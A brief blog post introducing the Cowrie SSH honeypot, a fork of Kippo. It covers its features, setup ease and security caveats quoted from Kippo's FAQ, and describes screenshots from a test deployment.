Cowrie – written by Michel Oosterhof – is a medium interaction SSH honeypot designed to log brute force attacks and shell interactions performed by the attackers. (Sounds familiar? Yes, it is a fork from Kippo).
The motivation of this blog post is just to have a quick glimpse into Cowrie – get a brief experience of what it’s like to handle Cowrie, and what’s the deployment process like, etc.
Everything you need is in the Github Repo
Michel did a very good job explaining what Cowrie is all about, how to set it up, etc. – All pretty much self-contained in the Github repo (https://github.com/micheloosterhof/cowrie).
Very similar to Kippo
If you’re already familiar with Kippo, you’ll be very comfortable with Cowrie. It also has many additional features on top of Kippo which I’ve yet to play with:
SFTP and SCP support for file upload;
Support for SSH exec command;
Logging of direct-TCP connection attempts (SSH proxying);
Logging in JSON format for easy processing in log management solutions; and
Many, many additional commands.
Is it secure?
Michel directed this question to the FAQ of Kippo: https://github.com/desaster/kippo/wiki/FAQ.
“Kippo is written in Python, and doesn’t call any external software, so it’s probably somewhat secure. Kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks (no limits on how many people can connect to it, or how many files they can download). It’s recommended to run Kippo in a well firewalled virtual machine.”
This is a really quick glimpse at Cowrie. It’s very easy to setup, and it looks very promising. I’ll do my best to find time to experiment with all the cool features written my Michel – and hopefully I’ll be able to do a more detailed write-up of Cowrie soon. So, stay tune!
Here’s some screenshots
Running Cowrie on port 2222. ifconfig reflects the correct IP address.
wget items remain in the fake filesystem
[caption id="attachment_5348" align="aligncenter" width="750"] Running Cowrie on port 2222. ifconfig reflects the correct IP address.[/caption][caption id="attachment_5347" align="aligncenter" width="800"] curl[/caption][caption id="attachment_5350" align="aligncenter" width="800"] wget[/caption][caption id="attachment_5349" align="aligncenter" width="582"] wget item remains in the fake filesystem.[/caption]